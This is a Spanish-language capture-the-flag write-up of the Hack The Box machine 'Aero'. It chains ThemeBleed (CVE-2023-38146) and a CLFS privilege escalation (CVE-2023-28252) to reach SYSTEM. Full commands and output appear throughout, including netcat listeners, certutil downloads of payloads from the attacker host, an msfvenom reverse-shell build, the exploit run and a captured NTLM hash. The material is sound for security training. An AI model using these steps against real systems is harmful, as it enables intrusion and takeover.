Entrada

Aero

Publicado Actualizado
Preview Image
Por Justice-Reaper
9 min de lectura
Aero

Skills

  • CVE-2023-38146 Exploitation (ThemeBleed - Windows 11 Themes Vulnerability)
  • CVE-2023-28252 Exploitation (CLFS - Common Log File System Vulnerability)

Certificaciones

  • OSCP
  • eJPT

Descripción

Aero es una máquina medium Windows, presenta dos CVEs recientes: CVE-2023-38146, que afecta a los temas de Windows 11, y CVE-2023-28252, que se dirige al Sistema de Archivos de Registro Común (CLFS). El acceso inicial se logra mediante la creación de un payload malicioso utilizando el proof-of-concept de ThemeBleed, lo que resulta en una reverse shell. Al obtener acceso, se encuentra un aviso de divulgación de CVE en el directorio del usuario, que indica vulnerabilidad a CVE-2023-28252. Es necesario modificar un proof-of-concept existente para facilitar la escalada de privilegios al nivel de administrador o la ejecución de código como NT Authority\SYSTEM

Reconocimiento

Se comprueba que la máquina está activa y se determina su sistema operativo, el ttl de las máquinas windows suele ser 128, en este caso hay un nodo intermediario que hace que el ttl disminuya en una unidad

1
2
3
4
5
6
7
8
9

# ping -c 3 10.129.229.128
PING 10.129.229.128 (10.129.229.128) 56(84) bytes of data.
64 bytes from 10.129.229.128: icmp_seq=1 ttl=127 time=73.2 ms
64 bytes from 10.129.229.128: icmp_seq=2 ttl=127 time=37.8 ms
64 bytes from 10.129.229.128: icmp_seq=3 ttl=127 time=37.3 ms

--- 10.129.229.128 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 37.301/49.452/73.222/16.809 ms

Nmap

Se va a realizar un escaneo de todos los puertos abiertos en el protocolo TCP a través de nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

# sudo nmap -p- --open --min-rate 5000 -sS -Pn -n -v 10.129.229.128 -oG openPorts
[sudo] password for justice-reaper: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-01 08:54 CEST
Initiating SYN Stealth Scan at 08:54
Scanning 10.129.229.128 [65535 ports]
Discovered open port 80/tcp on 10.129.229.128
Completed SYN Stealth Scan at 08:54, 26.37s elapsed (65535 total ports)
Nmap scan report for 10.129.229.128
Host is up (0.037s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
80/tcp open  http

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.45 seconds
           Raw packets sent: 131089 (5.768MB) | Rcvd: 21 (924B)

Se procede a realizar un análisis de detección de servicios y la identificación de versiones utilizando los puertos abiertos encontrados

1
2
3
4
5
6
7
8
9
10
11
12
13

# nmap -sCV -p 80 10.129.229.128 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-01 08:55 CEST
Nmap scan report for 10.129.229.128
Host is up (0.069s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Aero Theme Hub
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.38 seconds

Web Enumeration

Podemos subir archivos, como nos habla de temas de Windows 11, he visto que las extensiones de estos temas son .theme y .themepack

Web Exploitation

He encontrado este exploit https://github.com/Jnnshschl/CVE-2023-38146 el cual explota la vulnerabilidad ThemeBleed en los temas de Windows 11, lo primero que debemos hacer es ponernos en escucha por netcat

1

# rlwrap -cAr nc -lvnp 4711

Ejecutamos el exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

# python3 themebleed.py -r 10.10.16.29 -p 4711 
2024-10-01 10:22:20,270 INFO> ThemeBleed CVE-2023-38146 PoC [https://github.com/Jnnshschl]
2024-10-01 10:22:20,270 INFO> Credits to -> https://github.com/gabe-k/themebleed, impacket and cabarchive

2024-10-01 10:22:21,047 INFO> Compiled DLL: "./tb/Aero.msstyles_vrf_evil.dll"
2024-10-01 10:22:21,047 INFO> Theme generated: "evil_theme.theme"
2024-10-01 10:22:21,048 INFO> Themepack generated: "evil_theme.themepack"

2024-10-01 10:22:21,048 INFO> Remember to start netcat: rlwrap -cAr nc -lvnp 4711
2024-10-01 10:22:21,048 INFO> Starting SMB server: 10.10.16.29:445

2024-10-01 10:22:21,048 INFO> Config file parsed
2024-10-01 10:22:21,048 INFO> Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2024-10-01 10:22:21,048 INFO> Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2024-10-01 10:22:21,049 INFO> Config file parsed
2024-10-01 10:22:21,049 INFO> Config file parsed
2024-10-01 10:22:59,367 INFO> Incoming connection (10.129.229.128,57006)
2024-10-01 10:22:59,617 INFO> AUTHENTICATE_MESSAGE (AERO\sam.emerson,AERO)
2024-10-01 10:22:59,617 INFO> User AERO\sam.emerson authenticated successfully
2024-10-01 10:22:59,617 INFO> sam.emerson::AERO:aaaaaaaaaaaaaaaa:16fda741160bfff54304c03307ae3134:01010000000000008033cf1fdb13db012816647210fb94bb00000000010010007600530056004a005a00510046004600030010007600530056004a005a005100460046000200100043004c004a004600520058006b0074000400100043004c004a004600520058006b007400070008008033cf1fdb13db010600040002000000080030003000000000000000000000000020000008fe7cd3353de385d22afb19eac8fd7e7699d463ad1f6ac47a0cc5666c5d4bb70a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00320039000000000000000000
2024-10-01 10:22:59,655 INFO> Connecting Share(1:IPC$)
2024-10-01 10:22:59,731 INFO> Connecting Share(2:tb)
2024-10-01 10:22:59,770 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 1]
2024-10-01 10:23:00,149 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 1]
2024-10-01 10:23:00,504 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 7]
2024-10-01 10:23:00,656 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 5]
2024-10-01 10:23:01,497 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2024-10-01 10:23:01,657 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 1]
2024-10-01 10:23:03,245 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2024-10-01 10:23:03,396 WARNING> Stage 3/3: "Aero.msstyles_vrf.dll" [shareAccess: 5]
2024-10-01 10:23:10,341 INFO> Disconnecting Share(1:IPC$)
2024-10-01 10:23:36,073 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 1]

Ganamos acceso a la máquina víctima

1
2
3
4
5
6
7
8
9
10
11
12

# rlwrap -cAr nc -lvnp 4711

listening on [any] 4711 ...
connect to [10.10.16.29] from (UNKNOWN) [10.129.229.128] 57007
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
aero\sam.emerson

Privilege Escalation

En la carpeta Documents de nuestro usuario vemos un pdf

1
2
3
4
5
6
7
8
9
10

PS C:\Users\sam.emerson\Documents> dir
dir


    Directory: C:\Users\sam.emerson\Documents


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----
-a----         9/21/2023   9:18 AM          14158 CVE-2023-28252_Summary.pdf

Para transferirnos el pdf vamos a montarnos un servidor smb en nuestro equipo

1

# impacket-smbserver smbFolder $(pwd) -smb2support

Nos transferimos el archivo pdf

1

PS C:\Users\sam.emerson\Documents> copy CVE-2023-28252_Summary.pdf \\10.10.16.29\smbFolder\CVE-2023-28252_Summary.pdf

Visualizamos el contenido del pdf en el cual nos habla del CVE-2023-28252

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

# pdf2txt CVE-2023-28252_Summary.pdf 
CVE-2023-28252 Summary:
Vulnerability Type: Privilege Escalation
Target Component: Common Log File System (CLFS)
Risk Level: Critical
Exploitation Date: February 2022 onwards
Patch Released by Microsoft: April 2023

Background:
The Nokoyawa ransomware group has been active since February 2022, and it was only 
in April 2023 that Microsoft released a patch to address this issue. This 
vulnerability has been used as a means for attackers to gain unauthorized access to
Windows systems, making it imperative for us to apply the necessary patch to 
safeguard our infrastructure.
According to Kaspersky’s analysis, the Nokoyawa ransomware group has used other 
exploits targeting the CLFS driver since June 2022, with similar but distinct 
characteristics, all linked to a single exploit developer.

Actions Required:
Immediate Patching: We strongly recommend applying the security patch released by 
Microsoft for CVE-2023-28252 as soon as possible to mitigate the risk associated 
with this vulnerability. Failing to do so could leave our servers exposed to 
potential exploitation.

Review and Monitoring: In addition to patching, we should conduct a thorough review
of our server logs to check for any signs of suspicious activity or unauthorized 
access. Continuous monitoring of our server environment is crucial to ensure the 
security of our systems.

Security Awareness: It is essential to remind all team members of the importance of
practicing good cybersecurity hygiene. Encourage the use of strong, unique 
passwords and two-factor authentication wherever applicable.

Incident Response Plan: Ensure that our incident response plan is up-to-date and 
ready for immediate activation in case of any security incidents. Timely detection 
and response are critical in mitigating the impact of potential attacks.

Nos descargamos el exploit de este proyecto de github https://github.com/duck-sec/CVE-2023-28252-Compiled-exe.git y nos montamos un servidor http con python en nuestro equipo

1

# python -m http.server 80

Nos transferimos el exploit a la máquina víctima

1

PS C:\Users\sam.emerson\Documents> certutil.exe -urlcache -split -f http://10.10.16.29/exploit.exe

Creamos un binario shell.exe para que nos mande una reverse shell a nuestro equipo

1

# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.29 LPORT=443 -f exe > shell.exe

Nos transferimos el archivo shell.exe a la máquina víctima

1

PS C:\Users\sam.emerson\Documents> certutil.exe -urlcache -split -f http://10.10.16.29/shell.exe

Mos ponemos en escucha con netcat

1

# rlwrap nc -nlvp 443

Ejecutamos el exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64

PS C:\Users\sam.emerson\Documents> .\exploit.exe 1208 "C:\Users\sam.emerson\Documents\Shell.exe"
.\exploit.exe 1208 "C:\Users\sam.emerson\Documents\Shell.exe"
Executing command: (null)
[+] Incorrect number of arguments!
[+] Usage: exploit.exe <Token Offset> <Flag> <Program to execute>
[+] Example: exploit.exe 1208 1 calc.exe>
PS C:\Users\sam.emerson\Documents> .\exploit.exe 1208 1 "C:\Users\sam.emerson\Documents\Shell.exe"
.\exploit.exe 1208 1 "C:\Users\sam.emerson\Documents\Shell.exe"
Executing command: C:\Users\sam.emerson\Documents\Shell.exe


ARGUMENTS
[+] TOKEN OFFSET 4b8
[+] FLAG 1


VIRTUAL ADDRESSES AND OFFSETS
[+] NtFsControlFile Address --> 00007FFCCDD84240
[+] pool NpAt VirtualAddress -->FFFFD380743FF000
[+] MY EPROCESSS FFFFBE0BB60BE1C0
[+] SYSTEM EPROCESSS FFFFBE0BB36FF040
[+] _ETHREAD ADDRESS FFFFBE0BB6896080
[+] PREVIOUS MODE ADDRESS FFFFBE0BB68962B2
[+] Offset ClfsEarlierLsn --------------------------> 0000000000013220
[+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0
[+] Kernel ClfsEarlierLsn --------------------------> FFFFF80452C13220
[+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF80452C2BFB0
[+] Offset RtlClearBit --------------------------> 0000000000343010
[+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00
[+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0
[+] Kernel RtlClearBit --------------------------> FFFFF80450143010
[+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF804507C87B0

[+] Kernel PoFxProcessorNotification --------------------------> FFFFF804501DBD00


PATHS
[+] Folder Public Path = C:\Users\Public
[+] Base log file name path= LOG:C:\Users\Public\71
[+] Base file path = C:\Users\Public\71.blf
[+] Container file name path = C:\Users\Public\.p_71
Last kernel CLFS address = FFFFD3806EF69000
numero de tags CLFS founded 9

Last kernel CLFS address = FFFFD38077AAF000
numero de tags CLFS founded 1

[+] Log file handle: 00000000000000EC
[+] Pool CLFS kernel address: FFFFD38077AAF000

number of pipes created =5000

number of pipes created =4000
TRIGGER START
System_token_value: 4141414141414141
TRYING AGAIN
TRIGGER START
System_token_value: 4141414141414141
TRYING AGAIN
TRIGGER START
System_token_value: FFFFD3806A44159B
SYSTEM TOKEN CAPTURED
Closing Handle
ACTUAL USER=SYSTEM

Ganamos acceso como nt authority\system

1
2
3
4
5
6
7
8
9

# rlwrap nc -nlvp 443  
listening on [any] 443 ...
connect to [10.10.16.29] from (UNKNOWN) [10.129.229.128] 57072
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.

C:\Users\sam.emerson\Documents>whoami
whoami
nt authority\system
Hackthebox, Windows
CVE-2023-38146 CVE-2023-28252 ThemeBleed (Windows 11 Themes Vulnerability) CLFS (Common Log File System Vulnerability)
Esta entrada está licenciada bajo CC BY 4.0 por el autor.